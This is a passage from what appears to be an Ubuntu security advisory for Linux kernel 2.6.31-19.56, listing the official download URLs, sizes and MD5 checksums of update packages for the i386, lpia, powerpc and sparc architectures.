http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   186104 072e07c277b4f37611b21aad4390ccb0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    28372 82c8b14ef6982a48d3a8459d56ede43c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   292792 6c99c3b65ff7b159af94edf70358cb4a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:  2400232 94729dcb0c5adb15ded7b3302c4005eb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   142004 9e43481b4e46409d8e711a628ce5e40a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   189566 83afe6de56cab613b4f890723a82a6b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   148522 b96767af921427e880579659ba7b757a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    35306 a6a1cbe7a75490632f24cad479916315\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:     6842 86b286685eabaf8b6d28d3f922249503\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    86058 c014cfa81ab99a01793d25b995c7d75f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    46424 d525bcf1a39f6a21f09d52d24e6a0eb3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:     8916 f9efb7f192c3cc22c14df58803a64dfc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    36282 1d843fa9ef5beed8582f2924d0b53bcc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    21660 3ad0b4572c12885957a3b753fc3b9fe3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:  1495010 630f37fe420a74a22b4ca2eba4960999\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    44088 fddf56b0285ec3d0e6fc61e0fe8b86e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    48484 2614a20d6d57892a8789091eeeaa67b3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   117810 ff004889bca11286287a59c36fa24c0e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    14526 4c9cb3d5598c843bf5b90ddf0292d3c1\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   198810 76156647956f29c9e519aeac038c63bb\n    http://ports.ubuntu.com/pool/main/l/linux/char-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    32452 9a5dd5fe15dda0be28f7afd966e89af9\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    49936 31c4008b50016b2a6c3a90703f2becbb\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    42148 931518b24b123d3749719c35b2b23759\n    http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    45950 297c686f52a35049b3b2c87a96aebf68\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    87366 ec3f16cc0aeeef91b8c887ff347b6b0a\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    33750 a29ddd339c071c5b948c96e30f36f650\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   534366 b15b19f3e6c581d22514700dbd6502d8\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   128202 3d0f559a80187074bb210e3dae3bbfa0\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    49732 41abb7e30f0bdac62c5cd064c4b0ac3e\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   295732 12e912ce1f15d580960e7956de0c4ae0\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:  4186814 7c18e86a3f5a5a985488ad67718887f9\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-lpia_2.6.31-19.56_lpia.deb\n      Size/MD5:   674880 5dd2779cd5be613c330b7dc35410f271\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-lpia_2.6.31-19.56_lpia.deb\n      Size/MD5: 28831528 8eaab1870eda62e8ee231e429c361455\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_lpia.deb\n      Size/MD5:   742994 99d2d0609d9032e2810e19c92fc92834\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   172836 8b15eb5579853f45dc49055351df4225\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   186092 0eb0ceb5c23748d829f3e1d7977a35be\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    28366 0301ac544cf27b3dce660787d7575804\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   292736 16e84844c99e73b4e00419c38d78db3d\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:  2400366 43dda8f1a10775e382e7a328381265db\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   141998 930123e6b57798468d7085ae9f549150\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   189564 8d6e18aedb4b970a3643207b96589863\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   148506 78efdbf1323c68be564ad06205842cb6\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    35300 054cf95e7af87d6f744b69eb8166f275\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:     6828 5dbf32d40e88f471614e5cf286670e8f\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    86054 f24e7eaa3608985960e54a9048a24fb6\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    46410 80945eba79f53965effd546d23a8560b\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:     8906 e1c6021a615a4363dde2cf4a893fa53b\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    36270 eb2848e19ec2351b9102bc640e546991\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    21660 cfb271e26dfd127871f5d27547e0a7ba\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:  1494736 44113d529e3f4d3828f8719facd86370\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    44068 98817942a8188bd9281def20a1d327bb\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    48474 ebc9e58b5f98182006d6e3bb9c5ce179\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   117786 9b864dfc32d19a8cf2d61a68894835e9\n    http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    14524 9ad51e3871197eb84b193bd9a3b29ec2\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   321488 509ad8549565d0d87fe246df5b26c7af\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   263628 b7028cc16ec749cc2fdd86e985c7bc6a\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    58850 3e2f18df29a75debc326e5919c9c13da\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    67040 8fdde64943d01e5c6a372424d3d24a03\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    45914 6a21bb6fc6dce2767be6f974ffdab524\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    51296 4c928d4f04bf96f5cdc5ccf7d3a60c81\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    90684 eac2ea55da023924723593afffbb5d2c\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   105146 c407a156a5e56f284fa682d87d2ed50e\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    39492 38f377d5a0bdbbbb642545aa6d7f641c\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    39270 47f890e2a1418595d92858350aa16475\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   580998 825045ff82a442eaf1a21a5448b0cefb\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   626388 b56b5416b642ba57471e6e125b99a32f\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   149292 930001a305b0f78060f3472fe46cde00\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   147332 ef6994c30f19462a7fc0cb7cd8f4dacc\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    79750 75c6da2308e05334f89f62917aee5b3d\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    84136 caf2a7e924b03340e579e9bdc0a7ba50\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   402954 9fc3d4860f5c32aff3ac252379938fef\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   342516 5737df8ea2adfc45ecae9d322931187a\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  3813204 3ac91a51b3525bfbb0f6166fc140d7db\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  5193132 54dce7348221bcc93bbc01512d553a16\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb\n      Size/MD5:   784762 523b94315bff20137df79c5308abd5b7\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb\n      Size/MD5:   801042 2a8e55b23ad4dc09ee3cbb2fdc23cc28\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb\n      Size/MD5:   783708 185ba99656f4fa37874e0241e9f25dbb\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb\n      Size/MD5: 24820746 adc5365726ba88565ad89953707bd012\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb\n      Size/MD5: 25829918 fc82da730c6d730c5a4ac87d30594749\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb\n      Size/MD5: 24656226 7791f88107e97c5419f0e2d2f850c38e\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_powerpc.deb\n      Size/MD5:   728146 1dabe36864839475aab9293825cfc3e4\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   271924 8fb200d91f158f9b0eb209df5a5ffcd4\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   294610 317f7d34e3cd0ac823fcc5d48bcc9a7f\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   210546 041508a9555e18e2b8b4cab41b26f397\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   216984 845e2e452ef869aa3b39ea47bfa0280b\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    25798 19a7cae7e4f693c269f54dc0f2762f33\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    28984 419926b33e2b573f8d3ccaa5ade657f1\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   314922 83dcb63807ffb50682219b20333c23bc\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   357524 a32753bfca44b1afb9b11f72b25ebb9e\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  2027754 9b45ff8446ec0bad5befec2dc3ecdb72\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  2247744 35d212f7569bb03564a7f0294879557f\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   213544 3fb9afb7247290ffb3508744ab6cbb9f\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   209776 e42b20eb402cb2a55fea2a80f5cef162\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   210242 78939115c860efacb83481c0687f1a7a\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   244856 8fcff5fb05c0921681ec2bb44637c624\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   111834 a6b65e618a3240d51f36f37911d1d7cc\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   131610 dc5625deacbac446e71517f5902376b1\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    49028 ac60e4bf193e7725de6d8999c6231915\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    44082 531b2cbe15ec2f62fe61bd7002b1df02\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:     5852 f049a9332d469b247e451868b4f22cce\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:     6504 32fb4de3cd714598281c2d4d5d2ee6d6\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    79118 e98cffbfe6f6cbffcfa6dce199dc6c46\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    85190 e648dc2d3e124d68c47d4ec18836097f\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    74318 19b737ad1f43e7be1c6cc7e211085424\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    27228 0b5b4529d140289e616bded832055cbc\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:     8538 9010c080bd63660bf529930565d49f62\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:     9818 e909c37d26354ddbdceddc72628d71b3\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    58830 ae6573a0664b5486360156dd6711776c\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    70140 83085dfd5f4bb24ab67dd967e6b609cc\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    23714 86a598e1b13e4d6963475732e7a1097a\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    30804 b382bc0bfffd61156d0f8b3dc90bd307\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  1556894 ea2800c85a0115ad2e524a8b4ab4cb91\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  1509110 e42499f8bdbad020301a11617f6b65a8\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    81698 095ff78875bae0b90edd07ac3b51993d\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    88530 1a36ce88a0c6f7b495c869da15bf9d69\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    64400 8ff9a2aef998409440c1139f3db8c7ee\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    76990 392faa17f8c688e3856d91fb657eba09\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   141540 636e6d1827591a3aa46b82d7dc0b8ab6\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   151356 0f39f4d13770ceab049be6fb9c83fc16\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   139430 14f825a3334b18614059312527002767\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    70106 6dde178febff58a546142209374e1616\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    46510 64b0be995ce3d697a84cd3b0665ffe68\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    93974 28048300aba15f2a3937723bc0afc5cd\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   588788 c17e7feb3442296b7ed93c92cb988625\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   148426 6f429deb9df760daf28c04ad93ea6758\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    75862 6f382de52d9e1b52611c70a703895e5d\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:  2892370 ec9440bb8ee05a7ac071992c5711139f\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb\n      Size/MD5:   601506 1b56c59b3df953a640760b876d752465\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb\n      Size/MD5:   600680 166e5056f971d5fa031230c1af67d028\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb\n      Size/MD5: 20496992 6ebab55c96d6be71ffb8c3a493d31a74\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb\n      Size/MD5: 20193918 98b3c6e44f8e302cca36530b434e9525\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_sparc.deb\n      Size/MD5:   740254 b1a453339b4d68717a445f07b87b53a4\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   266068 1b8caecb838a9dd9b9c765f6603197a3\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   209168 e0e78f6a435e0ca46d5680e08d6e8db0\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    26268 f730be03c2b96e53e779a5d3df4cde93\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   314080 b673ee07d0c907d6ba00a561b915868d\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:  1675490 8642bd711b6643bd26ddc80674cef9e4\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   222882 136f6b9e24a16823f7309438fd0bd60a\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   121954 75090ea655204cc898db4634fc8aa021\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    38798 a11bcf765626194255c1d5a7d0106c2a\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   100798 af5903bc65fd381528f733fb1ba4100f\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:     8932 ebcb23a73a538276e41fcff9b7bb1d15\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    62926 7eba529ee44c2e107b693605dcbf1247\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   120960 8f63ad112de0797974650631dee53d13\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:  1217912 87a2a4f21ee86e0f36bc5298a226513b\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   101576 057a15ca3fa891e47216adcf5ae071f7\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   200148 f90834ae24c0f516ef83fa5aa66bafbb\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   184674 d704744a26941df63b9195288306fa7b\n\n. 